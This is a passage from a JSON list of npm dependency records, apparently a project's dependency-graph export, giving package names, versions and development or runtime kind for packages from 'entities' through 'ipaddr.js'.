entities@4.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857009,"package_name":"envinfo@7.8.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857012,"package_name":"error-ex@1.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857014,"package_name":"es-abstract@1.21.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857017,"package_name":"es-module-lexer@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857019,"package_name":"es-set-tostringtag@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857021,"package_name":"es-to-primitive@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857023,"package_name":"es2015-i18n-tag@1.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858487,"package_name":"es5-ext@0.10.62","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858488,"package_name":"es6-error@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858489,"package_name":"es6-iterator@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858490,"package_name":"es6-symbol@3.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858491,"package_name":"es6-weak-map@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858492,"package_name":"esbuild@0.17.18","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858493,"package_name":"esbuild@0.18.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858494,"package_name":"esbuild@0.19.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858502,"package_name":"escalade@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858503,"package_name":"escape-html@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858504,"package_name":"escape-string-regexp@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858505,"package_name":"escape-string-regexp@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858506,"package_name":"escape-string-regexp@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858507,"package_name":"escape-string-regexp@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858508,"package_name":"escodegen@1.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858509,"package_name":"escodegen@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858510,"package_name":"eslint-config-prettier@8.8.0(eslint@8.39.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858544,"package_name":"eslint-plugin-cypress@2.13.2(eslint@8.39.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858547,"package_name":"eslint-plugin-html@7.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858548,"package_name":"eslint-plugin-jest@27.2.1(@typescript-eslint","ecosystem":"npm","requirements":"eslint-plugin@6.7.2)(eslint@8.39.0)(jest@29.5.0)(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013858549,"package_name":"eslint-plugin-jsdoc@46.0.0(eslint@8.39.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858550,"package_name":"eslint-plugin-json@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858847,"package_name":"eslint-plugin-lodash@7.4.0(eslint@8.39.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858973,"package_name":"eslint-plugin-markdown@3.0.0(eslint@8.39.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858974,"package_name":"eslint-plugin-no-only-tests@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858975,"package_name":"eslint-plugin-tsdoc@0.2.17","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858976,"package_name":"eslint-plugin-unicorn@47.0.0(eslint@8.39.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858977,"package_name":"eslint-scope@5.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858978,"package_name":"eslint-scope@7.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858979,"package_name":"eslint-visitor-keys@3.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858980,"package_name":"eslint-visitor-keys@3.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858981,"package_name":"eslint@8.39.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858982,"package_name":"espree@9.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858983,"package_name":"esprima@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858984,"package_name":"esprima@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858985,"package_name":"esquery@1.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858986,"package_name":"esrecurse@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858987,"package_name":"estraverse@1.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858988,"package_name":"estraverse@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858989,"package_name":"estraverse@5.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858990,"package_name":"estree-walker@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858991,"package_name":"estree-walker@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013858992,"package_name":"estree-walker@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858993,"package_name":"esutils@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858994,"package_name":"esutils@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858995,"package_name":"etag@1.8.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858996,"package_name":"event-emitter@0.3.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858997,"package_name":"event-stream@3.3.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013858998,"package_name":"event-target-shim@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013858999,"package_name":"eventemitter2@6.4.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859000,"package_name":"eventemitter3@4.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859001,"package_name":"events@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859002,"package_name":"execa@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859003,"package_name":"execa@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859004,"package_name":"execa@5.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859005,"package_name":"execa@7.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859006,"package_name":"executable@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859007,"package_name":"exit@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859008,"package_name":"expect@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859009,"package_name":"express@4.18.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859010,"package_name":"ext@1.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859011,"package_name":"extend@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859012,"package_name":"extract-zip@2.0.1(supports-color@8.1.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859013,"package_name":"extsprintf@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859014,"package_name":"fast-content-type-parse@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859015,"package_name":"fast-decode-uri-component@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859016,"package_name":"fast-deep-equal@3.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859017,"package_name":"fast-equals@4.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859018,"package_name":"fast-glob@3.2.12","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859019,"package_name":"fast-glob@3.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859020,"package_name":"fast-json-stable-stringify@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859021,"package_name":"fast-json-stringify@2.7.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859054,"package_name":"fast-levenshtein@2.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859055,"package_name":"fast-redact@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859369,"package_name":"fast-safe-stringify@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859370,"package_name":"fastest-levenshtein@1.0.16","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859371,"package_name":"fastestsmallesttextencoderdecoder@1.0.22","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859401,"package_name":"fastify-plugin@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859402,"package_name":"fastify@3.29.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859425,"package_name":"fastq@1.13.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859426,"package_name":"fault@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859427,"package_name":"faye-websocket@0.11.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859428,"package_name":"fb-watchman@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859429,"package_name":"fd-slicer@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859430,"package_name":"ferrum@1.9.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859437,"package_name":"fetch-blob@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859438,"package_name":"fflate@0.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859439,"package_name":"figures@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859440,"package_name":"file-entry-cache@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859441,"package_name":"file-saver@2.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859442,"package_name":"filelist@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859443,"package_name":"fill-range@7.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859444,"package_name":"finalhandler@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859445,"package_name":"find-cache-dir@3.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859446,"package_name":"find-my-way@4.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859448,"package_name":"find-process@1.4.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859449,"package_name":"find-up@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859450,"package_name":"find-up@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859451,"package_name":"find-up@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859452,"package_name":"flat-cache@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859453,"package_name":"flatstr@1.0.12","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859463,"package_name":"flatted@3.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859464,"package_name":"flexsearch@0.7.31","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859480,"package_name":"focus-trap@7.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859481,"package_name":"follow-redirects@1.15.2(debug@4.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859482,"package_name":"for-each@0.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859483,"package_name":"foreground-child@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859484,"package_name":"foreground-child@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859485,"package_name":"forever-agent@0.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859486,"package_name":"form-data@2.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859487,"package_name":"form-data@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859488,"package_name":"format@0.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859489,"package_name":"formdata-polyfill@4.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859490,"package_name":"forwarded@0.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859491,"package_name":"fresh@0.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859492,"package_name":"from@0.1.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859493,"package_name":"fromentries@1.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859494,"package_name":"fs-extra@11.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859963,"package_name":"fs-extra@11.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859964,"package_name":"fs-extra@7.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859965,"package_name":"fs-extra@9.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859966,"package_name":"fs-monkey@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859967,"package_name":"fs.realpath@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859968,"package_name":"fsevents@2.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859969,"package_name":"function-bind@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859970,"package_name":"function.prototype.name@1.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859971,"package_name":"functions-have-names@1.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859972,"package_name":"gensequence@5.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859973,"package_name":"gensync@1.0.0-beta.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859974,"package_name":"get-caller-file@2.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859975,"package_name":"get-func-name@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859976,"package_name":"get-intrinsic@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859977,"package_name":"get-own-enumerable-property-symbols@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859978,"package_name":"get-package-type@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859979,"package_name":"get-stdin@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859980,"package_name":"get-stdin@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859981,"package_name":"get-stream@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859982,"package_name":"get-stream@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859983,"package_name":"get-stream@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859984,"package_name":"get-symbol-description@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859985,"package_name":"getos@3.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859986,"package_name":"getpass@0.1.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859987,"package_name":"git-raw-commits@2.0.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859988,"package_name":"github-slugger@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859989,"package_name":"glob-parent@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859990,"package_name":"glob-parent@6.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013859991,"package_name":"glob-promise@4.2.2(glob@7.2.3)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859992,"package_name":"glob-to-regexp@0.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013859993,"package_name":"glob@10.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860001,"package_name":"glob@7.1.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860002,"package_name":"glob@7.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860003,"package_name":"glob@8.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860004,"package_name":"global-dirs@0.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860005,"package_name":"global-dirs@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860125,"package_name":"globals@11.12.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860126,"package_name":"globals@13.19.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860127,"package_name":"globalthis@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860128,"package_name":"globalyzer@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860129,"package_name":"globby@11.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860130,"package_name":"globby@11.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860131,"package_name":"globby@13.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860132,"package_name":"globrex@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860133,"package_name":"glur@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860135,"package_name":"gopd@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860136,"package_name":"got@11.8.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860139,"package_name":"graceful-fs@4.2.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860140,"package_name":"grapheme-splitter@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860141,"package_name":"graphemer@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860142,"package_name":"gzip-size@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860143,"package_name":"handle-thing@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860144,"package_name":"handlebars@4.7.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860145,"package_name":"hard-rejection@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860146,"package_name":"has-ansi@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860147,"package_name":"has-bigints@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860148,"package_name":"has-flag@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860149,"package_name":"has-flag@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860150,"package_name":"has-own-prop@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860151,"package_name":"has-property-descriptors@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860152,"package_name":"has-proto@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860153,"package_name":"has-symbols@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860154,"package_name":"has-tostringtag@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860155,"package_name":"has@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860156,"package_name":"hasha@5.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860157,"package_name":"heap@0.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860158,"package_name":"highlight.js@10.7.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860159,"package_name":"hosted-git-info@2.8.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860160,"package_name":"hosted-git-info@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860161,"package_name":"hpack.js@2.1.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860162,"package_name":"html-encoding-sniffer@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860163,"package_name":"html-entities@2.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860164,"package_name":"html-escaper@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860165,"package_name":"html-to-image@1.11.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860397,"package_name":"htmlparser2@8.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860398,"package_name":"http-cache-semantics@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860399,"package_name":"http-deceiver@1.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860400,"package_name":"http-errors@1.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860401,"package_name":"http-errors@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860402,"package_name":"http-parser-js@0.5.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860403,"package_name":"http-proxy-agent@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860404,"package_name":"http-proxy-middleware@2.0.6(@types","ecosystem":"npm","requirements":"express@4.17.14)","direct":false,"kind":"development","optional":false},{"id":14013860405,"package_name":"http-proxy@1.18.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860406,"package_name":"http-signature@1.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860407,"package_name":"http2-wrapper@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860408,"package_name":"https-localhost@4.7.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860582,"package_name":"https-proxy-agent@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860584,"package_name":"human-signals@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860587,"package_name":"human-signals@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860589,"package_name":"human-signals@4.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860591,"package_name":"husky@8.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860704,"package_name":"is-wsl@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860594,"package_name":"iconv-lite@0.4.24","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860598,"package_name":"iconv-lite@0.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860601,"package_name":"idb@7.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860603,"package_name":"ieee754@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860605,"package_name":"ignore@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860608,"package_name":"ignore@5.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860610,"package_name":"import-fresh@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860613,"package_name":"import-local@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860616,"package_name":"import-meta-resolve@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860618,"package_name":"imurmurhash@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860621,"package_name":"indent-string@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860623,"package_name":"indent-string@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860625,"package_name":"inflight@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860627,"package_name":"inherits@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860629,"package_name":"inherits@2.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860631,"package_name":"ini@1.3.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860633,"package_name":"ini@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860636,"package_name":"ini@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860639,"package_name":"internal-slot@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860641,"package_name":"internmap@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860644,"package_name":"internmap@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860646,"package_name":"interpret@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860649,"package_name":"ipaddr.js@1.9.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860650,"package_name":"ipaddr.js@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860651,"package_name":"is-alphabetica